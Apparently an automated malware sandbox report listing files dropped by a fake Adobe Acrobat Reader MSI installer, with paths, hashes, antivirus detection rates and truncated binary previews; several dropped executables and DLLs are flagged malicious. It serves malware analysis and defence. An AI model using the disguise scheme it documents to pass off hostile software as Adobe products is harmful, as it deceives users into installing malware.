Preview:	VSO FONT CACHEP...............(d .x....]Wy&......,Y/.z]../J%K~..T.e..$[.!.\|Uu%].^.[%!..6.I.M.!d:.$i.CH<4...rCfhX!.....gM'.kz...z..4...g....}n.-.[Z.Tu.9......g..]M....Z.Nu..)u\...V.....{.15.?....nu..\|X.P........M.9......?....?{...."`K.0...8.8.x......n....0....&.....\|.....'._a\|...AX.X...p-`-`=....p#.6.v.=.].g..m$..s....U.....+......3....x.1.h...&B......Be.V(.%\.=u.....UK.V...j.u.v).?...&..y..=P...;...p.\..JM.E.1............p5..:...G6....6...yu.c..o..?_.`_.m.k......\..{...~.G...8.$.......a?.W.p.$.....<..n..oQ[.v.{..O..7-.G...v.....b.>..~...Y?...........Z....?.e.9.qj.....\.; .#\.=..R,....t..w...W.....k{...0.......~.E..uW.u.v.-n.Y..W......s~.;..\|....z..3Y....)....0.7.....u..a-7.I......c...ls.nW.....Yi.:..i(....6`.?.....m..}...P/....;.W...&.>=Gh.M....N.h.g#QJ...:.g.T.X>...q.y.S7...+..I\|...Q..8.P_1.WL`...:...M..t.).:.CX.-.\|..........<.3..aH.PNm....2......).0.c.4<E.5>.y8..:V..'P.L....$`..kc...N.....9G..38&..]...`.56..s.v.R..x/.d'...H.

C:\Users\user\AppData\Local\585948

Download File

Process:	C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	32
Entropy (8bit):	4.452819531114783
Encrypted:	false
SSDEEP:	3:1EypyZdh822:1XpyZdhn2
MD5:	649591EC6E1955F600CDDBD0CE88A8D0
SHA1:	8FEB6770BB942E9F6C8B960CD57C16326BE01527
SHA-256:	B74B1009A077AB22DA44B8F464C4EF266CD43371E7824BF7EA94FC4031B913AB
SHA-512:	DEB719BF3920B82F383D754CB52D2C4C472E65533F390D15DE99AC9E15FAE76BE10E09D0C7D317943CFBD5EB5EE8F5DF950C7EB15A9B02D60899CA5EDED37422
Malicious:	false
Reputation:	low
Preview:	[Generate Pasta]..xcULVDYSdDMK..

C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	27339496
Entropy (8bit):	6.909934045636559
Encrypted:	false
SSDEEP:	393216:+wlf3f5+Z5Q8eFapl37A0Rqo/y1Ma9wiU72rjqiUZqDIzyzTZ+2lSPQl8T5RM0qE:+w2lRyKDnPI6RMZ2rV
MD5:	48D732A19514BEF06ACC712F43FA7D65
SHA1:	F06845844E06879D355824CE1FCFA90244D526ED
SHA-256:	BA4612DB8CE37B8E64D163A4C8E236B0AD2DDC223B91383F270924846394BF95
SHA-512:	041AAA1C64DA4D81A6867A56EBD9D8BFD092BD584C09DE05349BCE42E3B718A36B45970240F0EC25BF962E59730276E51F116D2F7B609BEDA6993EDFA9248135
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 2% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...Y..].............................#.......0....@.......................... ......j............@....................A.......@.(....pV...X...................A...............................A.......................@......0A.0v...................text............................... ..`.itext..(....0...................... ..`.data...\|....0......................@....bss.........2..........................idata..(.....@.......2.............@....didata.0v...0A..x...b3.............@....edata........A.......3.............@..@.tls..........A..........................rdata..].....A.......3.............@..@.reloc........A.......3.............@..B.rsrc.....X..pV...X..lH.............@..@............. ......................@..@................

C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\avutil.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28138496
Entropy (8bit):	7.934724558644397
Encrypted:	false
SSDEEP:	393216:7cVskb7suR0KBF2+Pe6qvlRKOMIRcDA0Cd0kRp2wCyIMDBU9B2NNY:MIVKBF2+Pe7l8W0A0I0kRpj5IMDz6
MD5:	EF6839E8DB67D6995EAD096D1AAB5976
SHA1:	E10E6C32521A2C496C12F5A77AD02BC51BE17419
SHA-256:	3653B5ABEB9BE217A07E7BD669D59322923EB4EEB0C3E8258A8BA10AF0F94962
SHA-512:	8A44B0F527B9018742327D9CCB1E27BA3D04CC9A041DA2B5EC21ACB30E4138C4861EF704ADE22CB4FA36570A19D5CDA7FCE6EC068DE7A19E6478CC14E3054D7B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 43% Antivirus: Virustotal, Detection: 49%, Browse
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L...`a]e..................<..xm......).......0<.......................................................................n.37...E..D....................................................................................pg.....\.......................text.....;......................... ..`.itext..,+....<..................... ..`.data...\|....0<.....................@....bss....Po...P=..........................idata..$B....=.....................@....didata.......>.....................@....edata..37... >.....................@..@.rdata..D....`>.....................@..@.l*m....o.(..p>..................... ..`.)3i....p....pg.....................@....E k.....:....g..<.................. ..`.reloc...............N..............@..@.rsrc................X..............@..@.....................`......................@..@........................................................

C:\Windows\Installer\64d7bc.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {D69B9218-2190-4716-88FD-CE4B13CFF25A}, Number of Words: 10, Subject: Adobe Acrobat Reader, Author: Adobe Acrobat Reader, Name of Creating Application: Adobe Acrobat Reader (Evaluation Installer), Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados necessrios para instalar o Adobe Acrobat Reader. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Wed Nov 22 02:10:54 2023, Last Saved Time/Date: Wed Nov 22 02:10:54 2023, Last Printed: Wed Nov 22 02:10:54 2023, Number of Pages: 450
Category:	dropped
Size (bytes):	41085952
Entropy (8bit):	7.988485483123201
Encrypted:	false
SSDEEP:	786432:R59Ebw+dsspl4SB/MO46JBwcAtIcYNDFJxwQz5lbgB6XmtSVx:j9EXduS2xS9BJSQz5lEshV
MD5:	9175FED68D5D38DEE94BBD059F9ED69A
SHA1:	CB094B6EB86A9FB8C8BCB5A3A7567CC72858EAAA
SHA-256:	D8FC4F696F4BD1899ED92D8E9767646308C941CAC2EA826DBDD3E64F6926DB3D
SHA-512:	728655B5769FB124E2BE95D8EAF1608060E0B14F9785DC0697BB51645E9CB64E1A0074977757F8F723B35A981CBBFC3895AED84D816BA7465032165DE9A0CA2E
Malicious:	false
Reputation:	low
Preview:	......................>...................s...................................F.......c.......o.......................................................u...................................................................................................................................................................................................................................................................................................................................................................................................#...5........................................................................................... ...!..."...-.......%...&...'...(...)...*...+...,......./...3...0...1...2...6...4...>...@...7...8...9...:...;...<...=.......?.......A...B...C...D...E...........H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSIDD98.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	738656
Entropy (8bit):	6.613404997696155
Encrypted:	false
SSDEEP:	6144:NNNRBgD0EottR4BKvUNBHZQCAU9m9d98HyFGsDXTuph0lhSMXlBXBW/n6JTJU5h5:NNbIUOl3HasHowph0lhSMXlesu5eNBAp
MD5:	5A1F2196056C0A06B79A77AE981C7761
SHA1:	A880AE54395658F129E24732800E207ECD0B5603
SHA-256:	52F41817669AF7AC55B1516894EE705245C3148F2997FA0E6617E9CC6353E41E
SHA-512:	9AFC180EBC10C0EE0D7306F4B7085608A4E69321044D474691587BF7E63F945888781A9FC5E69568D351AC690B0335214BD04BDF5C75FD8A3BD1EC4BE5D3475A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: 6309e1.msi, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h/YQ,N7.,N7.,N7..<4.'N7..<2..N7.913.=N7.914.;N7.912.bN7..<3.5N7..<1.-N7..<6..N7.,N6..O7...>.@N7...7.-N7.....-N7.,N..-N7...5.-N7.Rich,N7.................PE..L... .Te.........."!...%.....z...............................................@............@..........................d.......n..,.......................`=...... m.....p...........................0...@...............x............................text............................... ..`.rdata..............................@..@.data...@%..........................@....rsrc...............................@..@.reloc.. m.......n..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIDE35.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	738656
Entropy (8bit):	6.613404997696155
Encrypted:	false
SSDEEP:	6144:NNNRBgD0EottR4BKvUNBHZQCAU9m9d98HyFGsDXTuph0lhSMXlBXBW/n6JTJU5h5:NNbIUOl3HasHowph0lhSMXlesu5eNBAp
MD5:	5A1F2196056C0A06B79A77AE981C7761
SHA1:	A880AE54395658F129E24732800E207ECD0B5603
SHA-256:	52F41817669AF7AC55B1516894EE705245C3148F2997FA0E6617E9CC6353E41E
SHA-512:	9AFC180EBC10C0EE0D7306F4B7085608A4E69321044D474691587BF7E63F945888781A9FC5E69568D351AC690B0335214BD04BDF5C75FD8A3BD1EC4BE5D3475A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: 6309e1.msi, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h/YQ,N7.,N7.,N7..<4.'N7..<2..N7.913.=N7.914.;N7.912.bN7..<3.5N7..<1.-N7..<6..N7.,N6..O7...>.@N7...7.-N7.....-N7.,N..-N7...5.-N7.Rich,N7.................PE..L... .Te.........."!...%.....z...............................................@............@..........................d.......n..,.......................`=...... m.....p...........................0...@...............x............................text............................... ..`.rdata..............................@..@.data...@%..........................@....rsrc...............................@..@.reloc.. m.......n..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIDE94.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	738656
Entropy (8bit):	6.613404997696155
Encrypted:	false
SSDEEP:	6144:NNNRBgD0EottR4BKvUNBHZQCAU9m9d98HyFGsDXTuph0lhSMXlBXBW/n6JTJU5h5:NNbIUOl3HasHowph0lhSMXlesu5eNBAp
MD5:	5A1F2196056C0A06B79A77AE981C7761
SHA1:	A880AE54395658F129E24732800E207ECD0B5603
SHA-256:	52F41817669AF7AC55B1516894EE705245C3148F2997FA0E6617E9CC6353E41E
SHA-512:	9AFC180EBC10C0EE0D7306F4B7085608A4E69321044D474691587BF7E63F945888781A9FC5E69568D351AC690B0335214BD04BDF5C75FD8A3BD1EC4BE5D3475A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: 6309e1.msi, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h/YQ,N7.,N7.,N7..<4.'N7..<2..N7.913.=N7.914.;N7.912.bN7..<3.5N7..<1.-N7..<6..N7.,N6..O7...>.@N7...7.-N7.....-N7.,N..-N7...5.-N7.Rich,N7.................PE..L... .Te.........."!...%.....z...............................................@............@..........................d.......n..,.......................`=...... m.....p...........................0...@...............x............................text............................... ..`.rdata..............................@..@.data...@%..........................@....rsrc...............................@..@.reloc.. m.......n..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIDEC4.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	738656
Entropy (8bit):	6.613404997696155
Encrypted:	false
SSDEEP:	6144:NNNRBgD0EottR4BKvUNBHZQCAU9m9d98HyFGsDXTuph0lhSMXlBXBW/n6JTJU5h5:NNbIUOl3HasHowph0lhSMXlesu5eNBAp
MD5:	5A1F2196056C0A06B79A77AE981C7761
SHA1:	A880AE54395658F129E24732800E207ECD0B5603
SHA-256:	52F41817669AF7AC55B1516894EE705245C3148F2997FA0E6617E9CC6353E41E
SHA-512:	9AFC180EBC10C0EE0D7306F4B7085608A4E69321044D474691587BF7E63F945888781A9FC5E69568D351AC690B0335214BD04BDF5C75FD8A3BD1EC4BE5D3475A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h/YQ,N7.,N7.,N7..<4.'N7..<2..N7.913.=N7.914.;N7.912.bN7..<3.5N7..<1.-N7..<6..N7.,N6..O7...>.@N7...7.-N7.....-N7.,N..-N7...5.-N7.Rich,N7.................PE..L... .Te.........."!...%.....z...............................................@............@..........................d.......n..,.......................`=...... m.....p...........................0...@...............x............................text............................... ..`.rdata..............................@..@.data...@%..........................@....rsrc...............................@..@.reloc.. m.......n..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIDF32.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	738656
Entropy (8bit):	6.613404997696155
Encrypted:	false
SSDEEP:	6144:NNNRBgD0EottR4BKvUNBHZQCAU9m9d98HyFGsDXTuph0lhSMXlBXBW/n6JTJU5h5:NNbIUOl3HasHowph0lhSMXlesu5eNBAp
MD5:	5A1F2196056C0A06B79A77AE981C7761
SHA1:	A880AE54395658F129E24732800E207ECD0B5603
SHA-256:	52F41817669AF7AC55B1516894EE705245C3148F2997FA0E6617E9CC6353E41E
SHA-512:	9AFC180EBC10C0EE0D7306F4B7085608A4E69321044D474691587BF7E63F945888781A9FC5E69568D351AC690B0335214BD04BDF5C75FD8A3BD1EC4BE5D3475A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h/YQ,N7.,N7.,N7..<4.'N7..<2..N7.913.=N7.914.;N7.912.bN7..<3.5N7..<1.-N7..<6..N7.,N6..O7...>.@N7...7.-N7.....-N7.,N..-N7...5.-N7.Rich,N7.................PE..L... .Te.........."!...%.....z...............................................@............@..........................d.......n..,.......................`=...... m.....p...........................0...@...............x............................text............................... ..`.rdata..............................@..@.data...@%..........................@....rsrc...............................@..@.reloc.. m.......n..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIE0C9.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	3435
Entropy (8bit):	5.3629334377620115
Encrypted:	false
SSDEEP:	48:ffRAXqSyrApA4RASAKASAYfASASABmGLlAsAAsbeAs85DAspCASASAB6B+iASAX0:ff2x7Af1ebEmpf1k7HO8i6HCcEEVfD
MD5:	2D0ECF3A8DAFE87BC743E28B252004AA
SHA1:	43B638EB73CB22B99563C69805E02E7BE899E627
SHA-256:	5F9D29E174C69A9AE17CE6B8667B7F9608E65D3D8CEC2592B285CA90ED276EE5
SHA-512:	E8CDF4C5246C86205D157E884844266583EF6472EBFFAD5DA1E883BB4C6294C10179130D70F8627BC7A10D7F7A51BE743B246DA46C4E01AE916E1426F9F55CB8
Malicious:	false
Preview:	...@IXOS.@.....@c..W.@.....@.....@.....@.....@.....@......&.{C9BC840A-0E96-4595-AE16-15CAE1E4F236}..Adobe Acrobat Reader#.Adobe_Acrobate_Reader_Pro-HAv70.msi.@.....@...-.@.....@........&.{D69B9218-2190-4716-88FD-CE4B13CFF25A}.....@.....@.....@.....@.......@.....@.....@.......@......Adobe Acrobat Reader......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@.....@.....@.]....&.{8AFCC14C-3554-4651-AE72-183FABA0C934}I.C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\.@.......@.....@.....@......&.{3FDBF9E2-D3D7-4369-9307-69499656012E}>.01:\Software\Adobe Acrobat Reader\Adobe Acrobat Reader\Version.@.......@.....@.....@......&.{2E9A95CE-09EE-4D5B-AB2B-D3355D78ABE9}..C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe.@.......@.....@.....@......&.{6069

C:\Windows\Installer\SourceHash{C9BC840A-0E96-4595-AE16-15CAE1E4F236}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1754844256588373
Encrypted:	false
SSDEEP:	12:JSbX72FjtXiAGiLIlHVRpg5h/7777777777777777777777777vDHFwAaa9Op4WF:JnSQI5G7DG4pF
MD5:	6EA34DEA2DE58D64FDB4FC94A7F6F831
SHA1:	3181E4F5201922C7C6D9B6DFDB22B2BA1ED51AE3
SHA-256:	D2B81DDC4DBA90AC946B829BAACD754100A128E463DA628F10B47C4E1CEBD2D2
SHA-512:	9B5DEF2048EE2652F76F17DBAD20C7BFE8445820540198B3009A34ECABCB6290C2C0B9A75AEFFCE200B7FD61C33F075581A59DC0EF0BB065A0790D3354EBE434
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5812018492404785
Encrypted:	false
SSDEEP:	48:e8PhuuRc06WXJOnT5bwYEqbvSCqbRAECiCyueowqbvSCqblTTZT:Rhu1lnT1l3VECd
MD5:	1FFAB0F5826AEFF377453E0B5C6831EE
SHA1:	327DE05E532DB871550A10ECFD063E6176A16858
SHA-256:	40658804621C3DE22D9948BEC2080061A3FB1F10CEA589D2B6DE0C139EC665F9
SHA-512:	A6ECCC9B07FF6CB2588DCE689429EFCA9B82A078D912A636E3A61EAA199296F7D36A92628106A459636F064FE7EF320DBC625CC4A5294CC16E172932CB7A3549
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	432221
Entropy (8bit):	5.37515840902574
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauJ:zTtbmkExhMJCIpErs
MD5:	48EBFCCFDEEF69B92FA5CA51C06F97E3
SHA1:	DE965770D51744EA5DF48E7C3994A7DB203FBDEC
SHA-256:	F0E35E29BB391549F0415E68D5DC81C14ECF51E6081781382CF36D54AA4B87F6
SHA-512:	FBCFFA779CC08F2C581871B0481EDFE100F151F7EA1B22F935489D30B749BD13520AAC9787CC038DB19932B5739A1566453BA1070765406D03F2AF25217003B6
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\Temp\~DF49702757D6BECEFA.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF6BD0B8509C2F5846.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.07981261001838455
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOS8IAaa9OH4oE24EKVky6l31:2F0i8n0itFzDHFwAaa9Op4Wl
MD5:	D01F02C035CED589EB80BEEA9066AEF4
SHA1:	08F3E782F5198B44CF7ED0368C12D606A76B44B7
SHA-256:	9B6B115697B0C3EAE8F552B4721010072C270F574E4A05A8773CEF3570F71F3E
SHA-512:	FC5F6A3D2C9E9C6727848114EB2A8164492B09DAB425EFA06E29DC5D923873C675A52B211E6F7C394DDFEF161A3AC6EB46324FDC123CC708909FD5F427107438
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF71E2B128E97403DC.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF8FA9FC790BD4CABF.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF9E1C2BA107952484.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFB22749FA912FA48F.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5812018492404785
Encrypted:	false
SSDEEP:	48:e8PhuuRc06WXJOnT5bwYEqbvSCqbRAECiCyueowqbvSCqblTTZT:Rhu1lnT1l3VECd
MD5:	1FFAB0F5826AEFF377453E0B5C6831EE
SHA1:	327DE05E532DB871550A10ECFD063E6176A16858
SHA-256:	40658804621C3DE22D9948BEC2080061A3FB1F10CEA589D2B6DE0C139EC665F9
SHA-512:	A6ECCC9B07FF6CB2588DCE689429EFCA9B82A078D912A636E3A61EAA199296F7D36A92628106A459636F064FE7EF320DBC625CC4A5294CC16E172932CB7A3549
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFB86E8ACE32F87706.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2666637587138507
Encrypted:	false
SSDEEP:	48:Rdmu7M+CFXJtT57wYEqbvSCqbRAECiCyueowqbvSCqblTTZT:XmhFTVl3VECd
MD5:	62608921BD1352AA628EDEF44CBB9199
SHA1:	EE1C049A318D2FE3D58321062BC3B89EE71598E6
SHA-256:	EB0F0C22FE06D6A02F622D193D6A334BFB20A0051DDC510F7AC37641CA29BFA3
SHA-512:	90AF457439F266ABA29630ABC50113C35A2E0F25FDEA089CDFB155ED76C276EF621F23CA3E173408CA1B5E38C3541A137F0A1B25C63185F0E98E34996F1F0627
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFC70C4054BA7F467E.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2666637587138507
Encrypted:	false
SSDEEP:	48:Rdmu7M+CFXJtT57wYEqbvSCqbRAECiCyueowqbvSCqblTTZT:XmhFTVl3VECd
MD5:	62608921BD1352AA628EDEF44CBB9199
SHA1:	EE1C049A318D2FE3D58321062BC3B89EE71598E6
SHA-256:	EB0F0C22FE06D6A02F622D193D6A334BFB20A0051DDC510F7AC37641CA29BFA3
SHA-512:	90AF457439F266ABA29630ABC50113C35A2E0F25FDEA089CDFB155ED76C276EF621F23CA3E173408CA1B5E38C3541A137F0A1B25C63185F0E98E34996F1F0627
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE29276C866055699.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5812018492404785
Encrypted:	false
SSDEEP:	48:e8PhuuRc06WXJOnT5bwYEqbvSCqbRAECiCyueowqbvSCqblTTZT:Rhu1lnT1l3VECd
MD5:	1FFAB0F5826AEFF377453E0B5C6831EE
SHA1:	327DE05E532DB871550A10ECFD063E6176A16858
SHA-256:	40658804621C3DE22D9948BEC2080061A3FB1F10CEA589D2B6DE0C139EC665F9
SHA-512:	A6ECCC9B07FF6CB2588DCE689429EFCA9B82A078D912A636E3A61EAA199296F7D36A92628106A459636F064FE7EF320DBC625CC4A5294CC16E172932CB7A3549
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE8C86463A7D1147D.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
